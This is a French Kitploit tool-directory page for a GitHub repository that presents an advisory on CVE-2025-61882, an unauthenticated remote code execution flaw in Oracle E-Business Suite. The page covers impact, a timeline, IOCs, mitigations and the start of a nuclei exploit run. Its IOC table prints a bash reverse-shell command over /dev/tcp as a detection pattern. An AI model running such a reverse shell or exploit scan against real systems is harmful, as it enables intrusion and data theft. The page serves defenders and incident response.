Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-61882 — Fournit un avis détaillé sur la CVE-2025-61882 avec une analyse technique, des IOC, des requêtes de détection et un modèle d'exploit basé sur nuclei pour la RCE pré-authentification d'Oracle E-Business Suite. | Kitploit
Outils/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionRenseignement sur les MenacesRéponse aux Incidents
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Fournit un avis détaillé sur la CVE-2025-61882 avec une analyse technique, des IOC, des requêtes de détection et un modèle d'exploit basé sur nuclei pour la RCE pré-authentification d'Oracle E-Business Suite.

Voir le dépôt
215il y a 0 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️🚨 CVE‑2025‑61882 — Exécution de code à distance critique sans authentification dans Oracle E‑Business Suite (EBS) 🚨🛡️

Résumé court : Exécution de code à distance critique sans authentification dans Oracle E‑Business Suite (EBS) — concerne les versions 12.2.3 → 12.2.14, CVSS 9.8, activement exploitée dans la nature (activité de rançongiciel/extorsion signalée). ([oracle.com][1])


📌 Faits rapides (tableau)

ChampDétails
🆔 CVECVE‑2025‑61882
🧾 Produit / ComposantOracle E‑Business Suite (EBS) — intégration Concurrent Processing / BI Publisher
📦 Versions concernées12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TypeExécution de code à distance (RCE) — aucune authentification requise
🔥 Exploitée dans la natureOui — campagnes d'exploitation massive / d'extorsion signalées
📅 Divulgation / chronologieOctobre 2025 (avis du fournisseur + analyses publiques). ([oracle.com][1])

(Consolidé ci-dessus à partir de l'avis du fournisseur, NVD/CISA et de plusieurs analyses de fournisseurs.) ([oracle.com][1])


💥 Impact (tableau)

Domaine d'impactCe que cela signifie
🔓 ConfidentialitéLes attaquants peuvent lire des données sensibles RH/finances/ERP
🛠️ IntégritéLes attaquants peuvent modifier des enregistrements, créer des backdoors ou altérer des configurations
⚡ DisponibilitéLes attaquants peuvent perturber les services, exécuter un rançongiciel ou détruire les sauvegardes
🧭 Niveau de risqueExtrême — RCE sans authentification sur un système ERP critique → possible pivot complet sur le domaine

Références signalant une exploitation à fort impact et un lien avec le rançongiciel. ([Rapid7][2])


🛠️ Résumé technique (concis)

  • Vecteur : Les requêtes HTTP/HTTPS vers les points de terminaison web EBS exposés déclenchent une chaîne de vulnérabilités dans l'intégration Concurrent Processing / BI Publisher conduisant à une exécution de code à distance. ([oracle.com][1])
  • Complexité : Faible (aucune authentification, aucune interaction utilisateur). ([nvd.nist.gov][3])
  • Payloads observés : modèles de reverse shell, web shells, scripts déposés utilisés pour l'exfiltration de données et l'extorsion. ([Rapid7][2])

🕵️‍♀️ Indicateurs de compromission (IOC) — exemples (tableau)

Oracle et les équipes de réponse aux incidents ont publié des IOC ; voici des exemples représentatifs signalés dans les avis et les analyses des fournisseurs. Recherchez ces modèles dans les journaux et les points de terminaison. ([oracle.com][1])

TypeExemple
🌐 IP (observées)200.107.207.26, 185.181.60.11 (exemples d'adresses signalés)
🧾 Modèle de commandesh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Empreintes de fichiersPlusieurs empreintes SHA‑256 pour des scripts d'exploitation suspects (voir l'avis du fournisseur pour la liste complète)
🕳️ ArtefactsWeb shells inattendus, nouvelles tâches cron, connexions sortantes suspectes vers des IP/ports inhabituels

Si vous voulez la liste complète des IOC (IP, empreintes complètes, noms de fichiers), je peux la coller ici — dites « colle les IOC ». (Aucun lien.)


🧭 Chronologie (compacte)

DateÉvénement
9 août 2025Première activité d'exploitation réelle signalée (télémétrie du fournisseur). ([crowdstrike.com][4])
Début octobre 2025Oracle a publié une alerte de sécurité / disponibilité des correctifs pour EBS. ([oracle.com][1])
6–7 octobre 2025CISA a ajouté la CVE à son catalogue Known Exploited Vulnerabilities (KEV) (directives pour les agences fédérales, date limite d'atténuation). ([cisa.gov][5])
Octobre 2025 (en cours)Plusieurs analyses de fournisseurs et rapports d'exploitation massive (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Actions recommandées immédiates (tableau d'étapes)

PrioritéActionNotes / exemples spécifiques
1️⃣ CritiqueCorriger les instances EBS concernéesAppliquez immédiatement les correctifs de l'alerte de sécurité Oracle pour les versions 12.2.3–12.2.14. ([oracle.com][1])
2️⃣ ÉlevéeIsoler / restreindre l'accès aux points de terminaison web EBSBloquez le HTTP/HTTPS exposé à Internet vers EBS ; autorisez uniquement les IP d'administration de confiance ou le VPN.
3️⃣ ÉlevéeActiver/ajuster les règles WAFDéployez les signatures WAF du fournisseur/communauté pour les modèles d'exploitation ; bloquez les payloads suspects. ([Rapid7][2])
4️⃣ ÉlevéeChasser & détecterRecherchez dans les journaux les commandes de reverse shell, les écritures de fichiers anormales et les connexions sortantes vers les IOC.
5️⃣ IncidentContenir & répondre en cas de compromissionIsolez l'hôte, préservez les preuves forensiques, changez les identifiants, reconstruisez à partir de sauvegardes propres.
6️⃣ PolitiqueSignaler & notifierSi vous êtes soumis à des exigences réglementaires/contractuelles, notifiez les parties prenantes et les autorités conformément à la politique (les directives CISA/KEV peuvent s'appliquer). ([nvd.nist.gov][3])

💀 Exploits :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io
Télécharger l’outil